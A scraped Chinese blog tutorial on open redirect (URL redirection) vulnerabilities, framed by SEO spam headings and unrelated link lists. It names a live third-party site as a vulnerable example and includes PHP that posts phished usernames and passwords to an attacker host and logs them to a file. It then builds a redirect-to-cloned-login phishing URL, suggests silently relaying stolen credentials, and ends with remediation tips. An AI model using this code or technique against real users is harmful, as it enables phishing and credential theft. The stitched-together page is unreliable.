当前位置: 首页 > news >正文

html5商城网站模板网站服务器租用一般费用

html5商城网站模板,网站服务器租用一般费用,满18点此转入2o2,河南省建设厅网站154号文件URL重定向漏洞 1. URL重定向1.1. 漏洞位置 2. URL重定向基础演示2.1. 查找漏洞2.1.1. 测试漏洞2.1.2. 加载完情况2.1.3. 验证漏洞2.1.4. 成功验证 2.2. 代码修改2.2.1. 用户端代码修改2.2.2. 攻击端代码修改 2.3. 利用思路2.3.1. 用户端2.3.1.1. 验证跳转 2.3.2. 攻击端2.3.2.1… URL重定向漏洞 1. URL重定向1.1. 漏洞位置 2. URL重定向基础演示2.1. 查找漏洞2.1.1. 测试漏洞2.1.2. 加载完情况2.1.3. 验证漏洞2.1.4. 成功验证 2.2. 代码修改2.2.1. 用户端代码修改2.2.2. 攻击端代码修改 2.3. 利用思路2.3.1. 用户端2.3.1.1. 验证跳转 2.3.2. 攻击端2.3.2.1. 跳转钓鱼2.3.2.2. 获取账号密码2.3.2.3. 查看账号密码 3. 修复4. 总结 1. URL重定向 URL跳转漏洞也叫开放重定向漏洞(open redirect) 。CWE-601对该漏洞的描述为http 参数可能包含一个 URL 值并可能导致 Web 应用程序将请求重定向到指定的 URL。通过修改恶意站点的 URL 值攻击者可能成功发起网络钓鱼诈骗并窃取用户凭据。简单说来就是参数可控导致的漏洞产生。 1.1. 漏洞位置 下面就是漏洞可能存在的一些位置。 用户登录、统一身份认证、认证完进行跳转。用户分享、收藏内容跳转。跨站点认证、授权后。站内其它链接跳转。注册、注销、修改密码等。账户切换、保存设置。 2. URL重定向基础演示 这里就是简单的查找演示不会将对真实的网站进行测试。 2.1. 查找漏洞 inurl:urlhttp://2.1.1. 测试漏洞 这里可以看到URL就是一个典型的后面带地址跳转的。 https://www.lsbin.com/wp-content/themes/begin%20lts/inc/go.php?urlhttp://picasion.com/2.1.2. 加载完情况 可以看到是跳转到另外一个网站了那么就证明这个是可以利用的。 2.1.3. 验证漏洞 这里我们将后面的地址修改为百度的地址看看是否能够正常跳转。 https://www.lsbin.com/wp-content/themes/begin%20lts/inc/go.php?urlhttps://baidu.com/2.1.4. 成功验证 这里可以看到成功跳转了。 2.2. 代码修改 代码修改这里由于特殊情况所以需要修改一下代码。 2.2.1. 用户端代码修改 这里就是为了让用户端能够接收跳转原本的靶场是不支持跳转的。 客户端搭建成功后修改zb_system/login.php文件加入代码 if(isset($_GET[url])){header(Location: . $_GET[url]); }2.2.2. 攻击端代码修改 这里就是为了能够实现一些密码读取的功能需要对其代码进行修改这里会代码的大佬就不用看了。 修改zb_system/cmd.php接收文件这里的IP地址要写攻击端的当然有域名肯定就写域名这里是我测试。 加入代码 $username$_POST[username]; $password$_POST[password]; echo script srchttp://192.168.10.40/zblog/zb_system/x.php?username$usernamepassword$password/script; 同样这里需要创建一个X.php来接收数据。 创建zb_system/x.php接受文件 ?php$user$_REQUEST[username]; $pass$_REQUEST[password]; //echo $user.$pass; $filefopen(users.txt,a); fwrite($file,$user.|.$pass); fclose($file);?2.3. 利用思路 这里我们可以这么想既然存在跳转的情况那么如果将URL后面的地址修改成功我们自己搭建的钓鱼界面的话那么是不是就可以成功进行钓鱼了比如在一些需要输入账号密码的输入框页面中那么当跳转后用户依旧以为是正常的跳转实际上已经跳转到攻击者构建的网站上了。 2.3.1. 用户端 这里打开页面发现是一个登录的页面那么登录页面就满足了我们钓鱼的想法那么就是制作一个一模一样的登录页面然后通过修改参数将账户密码读取出来。 http://192.168.10.30/zblog/zb_system/login.php2.3.1.1. 验证跳转 这里验证一下跳转这里也是成功跳转了。 http://192.168.10.30/zblog/zb_system/login.php?urlhttp://baidu.com2.3.2. 攻击端 这里再上面修改好了之后利用URL重定向进行钓鱼把你涉及的URL发送给别人让对方去点击那么点击后就会跳转若输入账号密码那么就会得到相关的账号密码或个人信息。 2.3.2.1. 跳转钓鱼 可以看到这里是成功跳转了如果你再创建一个域名比较像的那么是不是就实现了迷惑 http://192.168.10.30/zblog/zb_system/login.php?urlhttp://192.168.10.40/zblog/zb_system/login.php2.3.2.2. 获取账号密码 这里就等对方输入账户密码了这里当用户端输入账号密码后那么再攻击端就能够看到账号密码了当然这里是会出现登录错误的情况。 其实这里还有一个办法如果没有验证码的情况下可以再你的网站上做个中转比如将用户输入的账号密码记录下来的同时自动发送到原先的网站然后再去校验跳转回原来的网站这样就神不知鬼不觉了。 2.3.2.3. 查看账号密码 这里我们毕竟使用的是比如的靶场所以密码都是加密的如果是代码水平高自制一个也是可以的。 3. 修复 绕过方式网上也很多这里就不介绍了只要给几个修复建议吧 1.使用白名单2.在可能的情况下让用户提供在服务器端映射到完整目标 URL 的短名称、ID 或令牌3.不允许将 URL 作为目标的用户输入4.如果无法避免用户输入请确保提供的值有效、适用于应用程序并且已为用户授权5.从应用程序中删除重定向功能并将指向它的链接替换为指向相关目标 URL 的直接链接 4. 总结 以上就是关于url跳转漏洞的一些相关内容。这个漏洞是属于比较好理解的适合刚入门的新手学习。这个漏洞本身是低危的当在渗透测试时如果发现存在这个漏洞的时候不妨看看有没有机会和其他漏洞配合扩大攻击。
http://www.zqtcl.cn/news/961303/

相关文章:

  • 泰安网站建设收费标准直播视频app
  • 网站路径问题优秀的网站有哪些
  • 建设网站使用的工具大连免费网站制作
  • 专业的网站优化扬州市城乡建设网站
  • 射阳做网站的公司在哪品牌建设是指
  • 沈阳做网站好的网站分析论文
  • 做熟食的网站美食网站网站开发后端书籍
  • 做模板下载网站挣钱吗网站建设专业导航网站
  • 网站目录结构html静态网站作品
  • 南通建设局网站分类门户网站系统
  • 合肥网站建设企业秒玩小游戏入口
  • 个人做网站开发个人网站备案取名
  • 替代wordpress 搜索seo优化排名易下拉程序
  • asp.net 网站 方案小程序开发是前端还是后端
  • 网站开发 介绍 回扣建设项目验收在哪个网站公示
  • 建立网站免费如何做物流网站
  • 重庆网站设计费用wordpress自动翻页
  • 燕郊做网站的公司seo快速优化
  • 建了网站却搜不出来设计网站室内
  • 网站运营维护新闻摘抄大全
  • 怎么优化网站的单个关键词排名wordpress 安装百度编辑器
  • led网站建设方案模板做炒作的网站
  • 注册网站免费注册qq邮箱seo服务销售招聘
  • 翻译做网站php做网站好学吗
  • 网站模板 seo响应式网站内容布局
  • 石家庄住房和城乡建设部网站企业自助建站系统怎么建
  • 建设企业网站都需要啥网站开发 自我评价
  • 购物网站主页怎么做网站建设的优势何江
  • 宿州网站建设多少钱广西壮族自治区医保网上服务大厅
  • 宾馆酒店 网站模板wordpress手动获取相关文章